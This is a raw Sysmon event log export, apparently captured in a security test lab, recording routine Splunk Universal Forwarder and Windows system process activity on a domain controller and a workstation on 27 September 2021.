09:03:54.056{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.056{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.056{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.056{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.056{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88FA-6151-FD79-00000000FC01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.056{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88FA-6151-FD79-00000000FC01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:54.041{5EBD8912-88FA-6151-FD79-00000000FC01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.940{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFCD5D2B5846598932B16E040C15D162,SHA256=E40841D67B7DADA67F4F918FF6F4E7FC6CB45E21CDD2F78171A74C6019290F06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:55.657{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0790CA47AA8C6D1EE018F69477FFD184,SHA256=D9D736803B221D651D15C35737101E8C4AA9C14966F64BAA04BEF63E0ED0888F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:55.407{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6396CF77F0EC1955DE5834AFAD5C95C4,SHA256=6181BC05421BED09DB44385587E42C52BC3F1911E879BB4B087E3F1CD265E6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.725{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D81389242AA7F38B317DCD5727BD5593,SHA256=740A070D1720D9E140ED6C9A453C3D74C31BD8A4DB0EBAEC2F72375F91B7C70B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.593{5EBD8912-88FB-6151-FF79-00000000FC01}38763200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88FB-6151-FF79-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-88FB-6151-FF79-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.441{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88FB-6151-FF79-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.426{5EBD8912-88FB-6151-FF79-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:55.025{5EBD8912-88FA-6151-FE79-00000000FC01}52166220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.992{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98A05C52E4281E57C8285DFCA6563CD4,SHA256=1B3DABFBF4D2A454C313EF16B0AF9AF06332632D3213B7C57B4B92A9AA31EFE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:56.500{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC03A54FC0E567CC2EC6ECAE63AF94B3,SHA256=DC80571EA90A7D50E0325ECF1C0AA425A3296AF0489FD100BB0D80DE3023257A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.093{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88FC-6151-007A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.091{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.091{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.090{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.090{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.090{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-88FC-6151-007A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.089{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88FC-6151-007A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:56.073{5EBD8912-88FC-6151-007A-00000000FC01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 